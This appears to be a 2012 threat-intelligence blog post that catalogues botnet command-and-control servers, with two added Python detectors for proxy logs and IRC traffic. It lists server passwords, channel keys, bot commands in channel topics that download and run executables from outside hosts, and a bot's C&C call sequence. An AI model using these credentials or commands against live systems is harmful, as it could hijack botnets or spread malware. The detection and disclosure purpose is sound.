Note: New domains are at the bottom of the post.
This is the Skype "worm" that is in the news right now.
Articles:
http://www.techspot.com/news/50443-dorkbot-worm-spreading-via-skype-installs-nasty-ransomware.html
http://news.cnet.com/8301-1009_3-57528353-83/worm-spreading-on-skype-im-installs-ransomware/
http://techcrunch.com/2012/10/08/ransomware-worm-now-spreading-on-skype/
http://www.forbes.com/sites/adriankingsleyhughes/2012/10/08/ransomware-worm-spreading-via-skype/
http://countermeasures.trendmicro.eu/skype-worm-spreading-fast/
Resolved venus.timeinfo.pl to 63.223.107.62, 176.9.192.131, 213.165.71.142, 217.160.108.147, 213.165.71.153, 87.106.98.157, 74.208.112.178
Server: venus.timeinfo.pl
Port: 1863
Password: 24r34t
SSL is needed to connect; accept the invalid certificate.
Authhost: bossman
b4buj4ym0d3m.nl.ai (Aryan IRC botnet hosted by OVH Hosting Inc., Montreal, Canada)
Resolved b4buj4ym0d3m.nl.ai to 198.27.119.91
Server: b4buj4ym0d3m.nl.ai
Port: 6969
Channel: #Aryan#
Channel password: Aryan
* Topic for #Aryan# is: @Botkill
* Topic for #Aryan# set by God at Mon Oct 08 01:09:13 2012
No weed MOTD for this one.
Hosting info: http://whois.domaintools.com/198.27.119.91
lucasbaby.no-ip.info (IRC botnets hosted by OVH Hosting Inc., Montreal, Canada)
Resolved lucasbaby.no-ip.info to 142.4.203.95
Server: lucasbaby.no-ip.info
Port: 6969
Channel: #karmie#
Channel password: 1234
Nick: [USA|XP|gjetth]
Topic for #karmie# is: @dl 1 hxxp://dl.dropbox.com/u/81040225/raw_out.exe
Topic for #karmie# set by God at Sun Oct 07 13:42:09 2012
Opers:
[Boss] (Anxiety@HaZe.GoV): Anxiety
[Boss] ~#karmie#
[Boss] irc.HaZe.GoV :HaZeNet
[Boss] idle 12:09:34, signon: Mon Oct 08 00:16:30
[Boss] End of WHOIS
123.gets-it.net (Ganja IRC bot hosted by Hosting Solutions International Inc., St. Louis, United States)
Resolved 123.gets-it.net to 69.64.62.151
Server: 123.gets-it.net
Port: 6697
* Current Local Users: 34 Max: 40
* Current Global Users: 34 Max: 40
Channel: #Ganja
* Topic for #Ganja is: DO NOT USE THE SPEEDTEST COMMAND!
* Topic for #Ganja set by Anxiety at Sat Oct 06 02:54:30 2012
Opers:
* [Anxiety] (Anxiety@Test-5D47311C.bchsia.telus.net): Anxiety
* [Anxiety]
50.7.239.180 (Rage bots hosted by Fdcservers.net, Zlin, Czech Republic)
Server: 50.7.239.180
Port: 7777
Channel: #rage
* Topic for #rage is: .b0tk1ller 30 .p2p .rarworm .xpl 75 1 75.x.x.x 3 1 76.x.x.x
* Topic for #rage set by cyberthrill at Wed Oct 03 13:55:03 2012
Nick format: L0v3|fQrHrWbarp
Opers:
* [BGChaser] (Ares@sab-5E6EA00F.telnet.bg): Ares
* [BGChaser] @#rinfo @#binfo #rscan @#rage @#bkiller #b
* [BGChaser] 50.7.239.180 :Server
casinovegas.mobi (VoIP scanning botnet hosted by Sharktech, Missoula, United States)
I found this recently and thought it was interesting enough to post. It's an HTTP-controlled botnet used to scan for VoIP servers.
Malware actions:
Tells the C&C server it has installed: 208.98.52.163/90/getip.php?action=live
Requests an IP segment to scan: 208.98.52.163/90/getip.php?action=get
Downloads and installs Python (needed for the scanner): hxxp://208.98.52.163/90/files/python-2.7.2.msi
IP range to be scanned is confirmed: 208.98.52.163/90/insert.php?action=online&computer=USER-PC&range=95.211.169.45-95.211.199.255
UnRAR utility is downloaded: hxxp://208.98.52.163/90/files/UnRAR.exe
Scanner is downloaded: hxxp://208.98.52.163/90/files/pack.rar
The malware
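The check-in sequence above is simple enough to turn straight into a proxy-log detector. The following is an added example, not code from the original post: it assumes a constructed log format of one request per line (client IP, method, URL), uses the C&C host, paths and query parameters quoted above, and the sample log lines are constructed. Beyond flagging the hits, it parses the range= parameter so an analyst can see how much address space each bot was handed.

```python
"""Proxy-log detector for the HTTP C&C check-ins described above.

Added example, not the blog's own code. Assumed/constructed: the log format
(one request per line: client IP, method, URL) and the sample lines below.
The C&C host, paths and query parameters are the ones quoted in the post.
"""
import ipaddress
from urllib.parse import parse_qs, urlsplit

C2_HOST = "208.98.52.163"

# (path, query keys that must be present) -> stage label
C2_STAGES = {
    ("/90/getip.php", frozenset({"action"})): "checkin",
    ("/90/insert.php", frozenset({"action", "computer", "range"})): "scan-range-report",
    ("/90/files/python-2.7.2.msi", frozenset()): "payload-download",
    ("/90/files/UnRAR.exe", frozenset()): "payload-download",
    ("/90/files/pack.rar", frozenset()): "payload-download",
}


def classify_request(url):
    """Return (stage, details) when url is one of the C&C endpoints, else None."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    if parts.hostname != C2_HOST:
        return None
    qs = {k: v[0] for k, v in parse_qs(parts.query).items()}
    for (path, required), stage in C2_STAGES.items():
        if parts.path != path or not required <= set(qs):
            continue
        details = dict(qs)
        if stage == "scan-range-report":
            # range=<first>-<last>: the size shows how much IP space this bot was handed
            try:
                first, last = (ipaddress.ip_address(p) for p in qs["range"].split("-", 1))
                details["range_size"] = int(last) - int(first) + 1
            except ValueError:
                details["range_size"] = None  # malformed range, still worth the alert
        return stage, details
    return None


def scan_log(lines):
    """Return [(client_ip, stage, details)] for every request that hits the C&C."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        client, url = fields[0], fields[2]
        hit = classify_request(url)
        if hit is not None:
            hits.append((client, hit[0], hit[1]))
    return hits


# Constructed sample log: one infected host walking the full sequence, one clean host.
SAMPLE_LOG = """\
10.0.0.5 GET http://208.98.52.163/90/getip.php?action=live
10.0.0.5 GET http://208.98.52.163/90/getip.php?action=get
10.0.0.5 GET http://208.98.52.163/90/files/python-2.7.2.msi
10.0.0.5 GET http://208.98.52.163/90/insert.php?action=online&computer=USER-PC&range=95.211.169.45-95.211.199.255
10.0.0.7 GET http://www.example.com/index.html
10.0.0.5 GET http://208.98.52.163/90/files/UnRAR.exe
10.0.0.5 GET http://208.98.52.163/90/files/pack.rar
""".splitlines()

if __name__ == "__main__":
    for client, stage, details in scan_log(SAMPLE_LOG):
        print(client, stage, details)
```

Matching on host plus path plus required parameters, rather than on the bare IP, keeps the rule from firing on unrelated traffic to the same server, and the per-stage labels let you tell a fresh install (action=live) from a bot that has already been tasked (insert.php with a range).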
ns3.captain-packet.net (IRC botnet hosted by Psinet Inc., Washington, United States)
Resolved: [ns3.captain-packet.net] to [154.35.64.24]
Remote host: ns3.captain-packet.net
Port number: 3900
Captured client-side traffic:
PASS zomg
NICK banzl
USER ypawhj 0 0 :banzl
USERHOST banzl
MODE banzl -x+iB
JOIN ###bye### byeeeee
NICK pfyfxd
USER bagjsml 0 0 :pfyfxd
USERHOST pfyfxd
MODE pfyfxd -x+iB
NICK jyptrax
USER xncqm 0 0 :jyptrax
USERHOST jyptrax
MODE jyptrax -x+iB
NICK peaji
USER etngec 0 0 :peaji
USERHOST
crysis4.net (Andromeda HTTP bot hosted by Ukrainian Internet Names Center Ltd., Ukraine)
Resolved crysis4.net to 91.231.84.114
Gate URL: http://crysis4.net/knockout/image.php
Login URL: http://crysis4.net/knockout/index.php
Rootkit plugin: http://crysis4.net/test/r.pack
Hosting info: http://whois.domaintools.com/91.231.84.114
irc.whhcd.info (IRC botnet hosted by OVH SAS, Roubaix, France)
Resolved: [irc.whhcd.info] to [46.105.36.229]
Resolved: [irc.whhcd.info] to [176.31.33.45]
Resolved: [irc.whhcd.info] to [5.39.44.120]
Current Local Users: 63 Max: 286
Current Global Users: 254 Max: 2003
Server: irc.whhcd.info
Port: 6667
NICK h{UNK|x64}4927137B
USER UserName COMPUTERNAME .
tut0r1allsvu.info (ngr botnet hosted by Foroquimica Sl, Elk Grove Village, United States)
Resolved tut0r1allsvu.info to 75.127.10.3
Server: tut0r1allsvu.info
Port: 8059
Password: ocx
Channel: ##h4n
Channel password: shell3
* Topic for ##h4n is: -up hxxp://www.premiersportsgroup.co/utily.exe 96E0E5E5861397EF644FA006BB888956 | -s
* Topic for ##h4n set by Ko0l at Tue Oct 02 05:13:49 2012
Redirecting Colombian bots for pharming:
* Topic for #CO is: -mdns http://www.ellegadodelleon.com.ar/wp-content/it.txt
* Topic for #CO set by
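The raw client stream in the ns3.captain-packet.net entry (PASS/NICK/USER/USERHOST/MODE/JOIN, repeated on every reconnect), the nick templates quoted for lucasbaby.no-ip.info, 50.7.239.180 and irc.whhcd.info, and the download commands sitting in channel topics (@dl ..., -up <url> <md5>) are enough to build a small triage for captured IRC traffic. What follows is an added example, not the blog's own code: the CAPTURE lines are constructed from the bot commands quoted above plus one benign client for contrast, the nick regexes are this example's generalisation of the three nick formats on the page, and the scoring weights and the threshold of 5 are this example's own choices, not a published rule.

```python
"""Triage captured IRC client traffic for bot-style registration and harvest
download URLs/hashes from channel topics.

Added example, not the blog's own code. Constructed/assumed: the session
lines in CAPTURE (the bot commands quoted on the page plus one benign
client), the nick regexes generalised from the nick formats on the page,
and the scoring weights and threshold.
"""
import re

# Nick templates seen on this page: [USA|XP|gjetth], h{UNK|x64}4927137B, L0v3|fQrHrWbarp
BOT_NICK = re.compile(
    r"^(?:\[[A-Z]{2,3}\|[^|\]]+\|[A-Za-z0-9]+\]"       # [country|OS|random]
    r"|[A-Za-z0-9]*\{[A-Z]+\|x(?:86|64)\}[0-9A-F]{8}"  # prefix{country|arch}HEXID
    r"|[A-Za-z0-9]+\|[A-Za-z]{8,})$"                   # word|randomletters
)
URL_RE = re.compile(r"\bh(?:xx|tt)ps?://\S+", re.IGNORECASE)
MD5_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")
BOT_THRESHOLD = 5  # example choice, tune against your own captures


def split_sessions(lines):
    """Group client->server commands into registration sequences.

    The capture on the page repeats PASS/NICK/USER/USERHOST/MODE/JOIN for
    every reconnect, so a PASS or NICK arriving after a USER starts a new one.
    """
    sessions, cur, registered = [], [], False
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        verb = line.split(" ", 1)[0].upper()
        if verb in ("PASS", "NICK") and registered:
            sessions.append(cur)
            cur, registered = [], False
        cur.append(line)
        if verb == "USER":
            registered = True
    if cur:
        sessions.append(cur)
    return sessions


def score_session(cmds):
    """Return (nick, score, reasons) for one registration sequence."""
    by_verb = {}
    for c in cmds:
        verb, _, rest = c.partition(" ")
        by_verb.setdefault(verb.upper(), []).append(rest.strip())
    nick = by_verb.get("NICK", [""])[0]
    score, reasons = 0, []
    if BOT_NICK.match(nick):
        score += 3
        reasons.append("nick matches a bot template")
    user = by_verb.get("USER", [""])[0]
    # "USER <random> 0 0 :<nick>" as in the capture: both middle fields 0, realname is just the nick
    if re.match(r"^\S+ 0 0 :\S+$", user) and user.rsplit(":", 1)[1] == nick:
        score += 2
        reasons.append("USER line is <random> 0 0 :<nick>")
    if nick and nick in by_verb.get("USERHOST", []):
        score += 1
        reasons.append("looks up its own host right after registering")
    if any(m.endswith(" -x+iB") for m in by_verb.get("MODE", [])):
        score += 2
        reasons.append("sets -x+iB on itself (+B is the bot user mode on UnrealIRCd-style servers)")
    if any(len(j.split()) >= 2 for j in by_verb.get("JOIN", [])):
        score += 1
        reasons.append("joins a keyed channel during registration")
    return nick, score, reasons


def triage(lines):
    """Return [(nick, score, reasons)] for sessions scoring at or above BOT_THRESHOLD."""
    return [r for r in map(score_session, split_sessions(lines)) if r[1] >= BOT_THRESHOLD]


def extract_topic_payloads(topic):
    """Pull download URLs (defanged hxxp left as-is) and MD5-looking hashes out of a topic."""
    return {"urls": URL_RE.findall(topic), "md5": [h.upper() for h in MD5_RE.findall(topic)]}


# Constructed capture: the first two bot sessions quoted on the page, then a benign client.
CAPTURE = """\
PASS zomg
NICK banzl
USER ypawhj 0 0 :banzl
USERHOST banzl
MODE banzl -x+iB
JOIN ###bye### byeeeee
NICK pfyfxd
USER bagjsml 0 0 :pfyfxd
USERHOST pfyfxd
MODE pfyfxd -x+iB
NICK alice
USER alice 0 * :Alice Example
JOIN #help
""".splitlines()

if __name__ == "__main__":
    for nick, score, reasons in triage(CAPTURE):
        print(nick, score, "; ".join(reasons))
    print(extract_topic_payloads("-up hxxp://www.premiersportsgroup.co/utily.exe 96E0E5E5861397EF644FA006BB888956 | -s"))
```

The nick regex alone is a weak signal (a human could pick a nick with a pipe in it), which is why the score combines it with the registration shape; the ns3.captain-packet.net bots have ordinary-looking nicks and are caught entirely by the USER/USERHOST/MODE pattern. The topic extractor keeps hxxp:// defanging intact so hashes and URLs can be pasted into a blocklist without accidentally becoming live links.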